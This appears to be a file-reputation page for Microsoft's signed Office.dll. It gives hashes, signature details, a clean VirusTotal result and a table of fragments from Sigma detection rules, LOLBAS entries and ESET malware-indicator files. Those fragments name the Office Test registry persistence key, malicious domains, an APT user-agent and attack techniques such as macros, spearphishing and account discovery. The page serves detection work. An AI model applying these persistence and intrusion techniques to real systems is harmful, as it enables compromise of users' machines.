Office.dll

  • File Path: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Office.dll
  • Description: Microsoft.Office.Core

Hashes

Type Hash
MD5 57FDD8BE6071DFC46128DCCAD5E25863
SHA1 F0601F41B06D836183442FE98BECD84400CF98D1
SHA256 0194C022C826D59407487096D208896A2465BA1A4C58EAC1D1AB96D9C2376A7E
SHA384 D12328D6134315401A6BC7EA0D59409358ABCB06A5C9A4EB8B1FB9C7A1B8E6FC76C0308716DC25CB15E6FCDAA7F01D8C
SHA512 C9C44F63862EE6BE2C02489E6AC2DBEE91990734912809A94C73B38DFCCAF98B63F309CE75BE64631CB696788981738400B1C45DFA6872AC552B4BBD6B0E6E2C
SSDEEP 12288:vsVUG62f8eQPrlGC9uk9IsbVYVsTEVcyjlycUn8:vsVUG62f8eQPrjY6VYViEX
IMP DAE02F32A21E03CE65412F6E56942DAA
PESHA1 FC44CD355B0011F7C2864B1C1F3D9EF2590AAAC1
PE256 813E1FECE65C0944DE77F774604470178AE47ACFB8CDAB1CDE43975566AE4C03

Signature

  • Status: Signature verified.
  • Serial: 330000010A2C79AED7797BA6AC00010000010A
  • Thumbprint: 3BDA323E552DB1FDE5F4FBEE75D6D5B2B187EEDC
  • Issuer: CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: Core Primary Interop Assembly
  • Product Name: Microsoft Office 2010
  • Company Name: Microsoft Corporation
  • File Version: 14.0.4733.1000
  • Product Version: 14.0.4733.1000
  • Language: Language Neutral
  • Legal Copyright: 2010 Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/72
  • VirusTotal Link: https://www.virustotal.com/gui/file/0194c022c826d59407487096d208896a2465ba1a4c58eac1d1ab96d9c2376a7e/detection/

Possible Misuse

The following table contains possible examples of Office.dll being misused. While Office.dll is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml # Office Dropper Detection DRL 1.0
sigma proxy_ua_apt.yml - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)' # https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html DRL 1.0
sigma sysmon_office_persistence.yml title: Microsoft Office Add-In Loading DRL 1.0
sigma sysmon_susp_office_dotnet_assembly_dll_load.yml title: dotNET DLL Loaded Via Office Applications DRL 1.0
sigma sysmon_susp_office_dotnet_assembly_dll_load.yml description: Detects any assembly DLL being loaded by an Office Product DRL 1.0
sigma sysmon_susp_office_dotnet_clr_dll_load.yml title: CLR DLL Loaded Via Office Applications DRL 1.0
sigma sysmon_susp_office_dotnet_clr_dll_load.yml description: Detects CLR DLL being loaded by an Office Product DRL 1.0
sigma sysmon_susp_office_dotnet_gac_dll_load.yml title: GAC DLL Loaded Via Office Applications DRL 1.0
sigma sysmon_susp_office_dotnet_gac_dll_load.yml description: Detects any GAC DLL being loaded by an Office Product DRL 1.0
sigma sysmon_susp_office_dsparse_dll_load.yml title: Active Directory Parsing DLL Loaded Via Office Applications DRL 1.0
sigma sysmon_susp_office_dsparse_dll_load.yml description: Detects DSParse DLL being loaded by an Office Product DRL 1.0
sigma sysmon_susp_office_kerberos_dll_load.yml title: Active Directory Kerberos DLL Loaded Via Office Applications DRL 1.0
sigma sysmon_susp_office_kerberos_dll_load.yml description: Detects Kerberos DLL being loaded by an Office Product DRL 1.0
sigma sysmon_malware_verclsid_shellcode.yml description: Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro DRL 1.0
sigma sysmon_malware_verclsid_shellcode.yml SourceImage: '*\Microsoft Office\\*' DRL 1.0
sigma win_exploit_cve_2017_11882.yml - https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw DRL 1.0
sigma win_office_shell.yml title: Microsoft Office Product Spawning Windows Shell DRL 1.0
sigma win_office_spawn_exe_from_users_directory.yml title: MS Office Product Spawning Exe in User Dir DRL 1.0
sigma win_susp_msoffice.yml title: Malicious Payload Download via Office Binaries DRL 1.0
sigma win_susp_msoffice.yml - https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 DRL 1.0
sigma sysmon_office_test_regadd.yml title: Office Application Startup - Office Test DRL 1.0
sigma sysmon_office_test_regadd.yml description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed everytime an Office application is started DRL 1.0
sigma sysmon_office_test_regadd.yml - 'HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf' DRL 1.0
sigma sysmon_office_test_regadd.yml - 'HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf' DRL 1.0
sigma sysmon_reg_office_security.yml title: Office Security Settings Changed DRL 1.0
sigma sysmon_reg_office_security.yml description: Detects registry changes to Office macro settings DRL 1.0
LOLBAS Winword.yml Description: Document editor included with Microsoft Office.  
LOLBAS Winword.yml - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE  
LOLBAS Appvlp.yml Description: Application Virtualization Utility Included with Microsoft Office 2016  
LOLBAS Appvlp.yml OperatingSystem: Windows 10 w/Office 2016  
LOLBAS Appvlp.yml - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe  
LOLBAS Appvlp.yml - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe  
LOLBAS Appvlp.yml - Link: https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/  
LOLBAS Excel.yml Description: Microsoft Office binary  
LOLBAS Excel.yml - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files\Microsoft Office\Office16\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files\Microsoft Office\Office15\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files\Microsoft Office\Office14\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe  
LOLBAS Excel.yml - Path: C:\Program Files\Microsoft Office\Office12\Excel.exe  
LOLBAS Excel.yml - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191  
LOLBAS Powerpnt.yml Description: Microsoft Office binary.  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office\Office16\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office\Office16\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office\Office15\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office\Office15\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office\Office14\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office\Office14\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files (x86)\Microsoft Office\Office12\Powerpnt.exe  
LOLBAS Powerpnt.yml - Path: C:\Program Files\Microsoft Office\Office12\Powerpnt.exe  
LOLBAS Powerpnt.yml - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191  
LOLBAS Sqldumper.yml - Path: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe  
LOLBAS Winword.yml Description: Microsoft Office binary  
LOLBAS Winword.yml - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files (x86)\Microsoft Office\Office16\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files\Microsoft Office\Office16\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files (x86)\Microsoft Office\Office15\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files\Microsoft Office\Office15\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files (x86)\Microsoft Office\Office14\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files\Microsoft Office\Office14\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe  
LOLBAS Winword.yml - Path: C:\Program Files\Microsoft Office\Office12\winword.exe  
LOLBAS Winword.yml - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191  
malware-ioc misp-dukes-operation-ghost-event.json "Office Monkeys", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "description": "Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "description": "Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)", © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "https://www.uperesia.com/analyzing-malicious-office-documents" © ESET 2014-2018
malware-ioc misp-dukes-operation-ghost-event.json "https://github.com/itsreallynick/office-crackros" © ESET 2014-2018
malware-ioc gamaredon \|DFC941F365E065187B5C4A4BF42E770035920856\|C# Office macro injection module\|Win32/Pterodo.XG.gen © ESET 2014-2018
malware-ioc gamaredon \|9AFC9D6D72F78B2EB72C5F2B87BDC7D59C1A14ED\|Batch file/VBScript Office macro injection module\|Win32/Pterodo.ZM © ESET 2014-2018
malware-ioc gamaredon office-constructor.ddns.net © ESET 2014-2018
malware-ioc interception https://km.wu.ac[.]th/image/office.jpg © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n### Browser-based Exploitation\n\nWeb browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1192). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n### Office Applications\n\nCommon office and productivity applications such as Microsoft Office are also targeted through [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193), [Spearphishing Link](https://attack.mitre.org/techniques/T1192), and [Spearphishing via Service](https://attack.mitre.org/techniques/T1194). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n### Common Third-party Applications\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)", © ESET 2014-2018
malware-ioc misp_invisimole.json "https://www.uperesia.com/analyzing-malicious-office-documents" © ESET 2014-2018
malware-ioc misp_invisimole.json "https://github.com/itsreallynick/office-crackros" © ESET 2014-2018
malware-ioc misp_invisimole.json "Office 365 account logs", © ESET 2014-2018
malware-ioc misp_invisimole.json "Office 365", © ESET 2014-2018
malware-ioc misp_invisimole.json "description": "Adversaries may attempt to get a listing of local system or domain accounts. \n\n### Windows\n\nExample commands that can acquire this information are <code>net user</code>, <code>net group <groupname></code>, and <code>net localgroup <groupname></code> using the [Net](https://attack.mitre.org/software/S0039) utility or through use of [dsquery](https://attack.mitre.org/software/S0105). If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) may apply.\n\n### Mac\n\nOn Mac, groups can be enumerated through the <code>groups</code> and <code>id</code> commands. In mac specifically, <code>dscl . list /Groups</code> and <code>dscacheutil -q group</code> can also be used to enumerate groups and users.\n\n### Linux\n\nOn Linux, local users can be enumerated through the use of the <code>/etc/passwd</code> file which is world readable. In mac, this same file is only used in single-user mode in addition to the <code>/etc/master.passwd</code> file.\n\nAlso, groups can be enumerated through the <code>groups</code> and <code>id</code> commands.\n\n### Office 365 and Azure AD\n\nWith authenticated access there are several tools that can be used to find accounts. The <code>Get-MsolRoleMember</code> PowerShell cmdlet can be used to obtain account names given a role or permissions group.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance)\n\nAzure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command <code>az ad user list</code> will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) \n\nThe <code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)", © ESET 2014-2018
malware-ioc nouns.txt office © ESET 2014-2018
malware-ioc oceanlotus-macOS.misp.event.json "https:\/\/github.com\/itsreallynick\/office-crackros", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "value": "office.ourkekwiciver.com", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "description": "Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.\n\nSeveral types exist:\n\n===Browser-based Exploitation===\n\nWeb browsers are a common target through Drive-by Compromise and Spearphishing Link. Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.\n\n===Office Applications===\n\nCommon office and productivity applications such as Microsoft Office are also targeted through Spearphishing Attachment, Spearphishing Link, and Spearphishing via Service. Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.\n\n===Common Third-party Applications===\n\nOther applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.\n\nDetection: Detecting software exploitation may be difficult depending on the tools available. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the browser or Office processes. This could include suspicious files written to disk, evidence of Process Injection for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.\n\nPlatforms: Linux, Windows, macOS\n\nData Sources: Anti-virus, System calls, Process Monitoring\n\nSystem Requirements: Remote exploitation for execution requires a remotely accessible service reachable over the network or other vector of access such as spearphishing or drive-by compromise.\n\nRemote Support: Yes", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate\/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed\/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.\n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux\/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a Command-Line Interface. Environment variables, aliases, characters, and other platform\/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)\n\nAnother example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding Invoke-PSImage. The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used Invoke-PSImage to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)\n\nDetection: Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).\n\nFlag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''\"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files\/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016)\n\nObfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Network protocol analysis, Process use of network, Binary file metadata, File monitoring, Malware reverse engineering, Process command-line parameters, Environment variable, Process Monitoring, Windows event logs, Network intrusion detection system, Email gateway, SSL\/TLS inspection\n\nDefense Bypassed: Host forensic analysis, Signature-based detection, Host intrusion prevention systems, Application whitelisting, Process whitelisting, Log analysis, Whitelisting by file name or path\n\nContributors: Red Canary, Christiaan Beek, @ChristiaanBeek", © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "https:\/\/github.com\/itsreallynick\/office-crackros"] © ESET 2014-2018
malware-ioc oceanlotus-rtf_ocx_campaigns.misp.event.json "description": "Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.\n\nDetection: Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as Exploitation for Client Execution and Scripting.\n\nPlatforms: Linux, Windows, macOS\n\nData Sources: File monitoring, Packet capture, Mail server, Network intrusion detection system, Detonation chamber, Email gateway", © ESET 2014-2018
malware-ioc oceanlotus * office.ourkekwiciver.com`` © ESET 2014-2018
malware-ioc 2017-05-09_Trump_Attack_on_Syria_IoCs.adoc - 18b7dd3917231d7bae93c11f915e9702aa5d1bbb - Office RCE © ESET 2014-2018
malware-ioc 2017-05-09_Trump_Attack_on_Syria_IoCs.adoc - HKCU\Software\Microsoft\Office test\Special\Perf|%TEMP%\apisecconnect.dll`` © ESET 2014-2018
malware-ioc 2017-05-09_Trump_Attack_on_Syria_IoCs.json "value": "HKCU\\Software\\Microsoft\\Office test\\Special\\Perf\|%TEMP%\\apisecconnect.dll", © ESET 2014-2018
malware-ioc part1.adoc HKCU\Software\Microsoft\Office test\Special\Perf © ESET 2014-2018
malware-ioc stantinko var b = "mts rt megafonpro megafon mpoisk mail google yandex ya rambler youtube dfiles turbobit prom zakupka pravo letitbit ozon urokitio kismia webnice toy mdmbank tele2 roboforex share4web 7do dixy kiino 4allforum delo-press raskachaem satu spmag yugcontract narodnoe materinstvo dimonvideo kia-club deal icloud littlebyte maxpark 24video vdgb trud appsruel tiu blanker aucland office ontabfile microsoft shopotam shareflare autoportal stilagoby malina depositfiles hitfile crocs telecom effectfree forum.calorizator.ru traektoria cdek takko circ-a tinydeal otzyv mamba rusfolder irn labirint vip-file 10.150.0.104".split(" "); © ESET 2014-2018
malware-ioc misp-mosquito-event.json "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O\u2019 Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", © ESET 2014-2018
malware-ioc misp-turla-comrat-v4-event.json "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O’ Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", © ESET 2014-2018
malware-ioc misp-turla-crutch-event.json "description": "A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O\u2019 Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'", © ESET 2014-2018
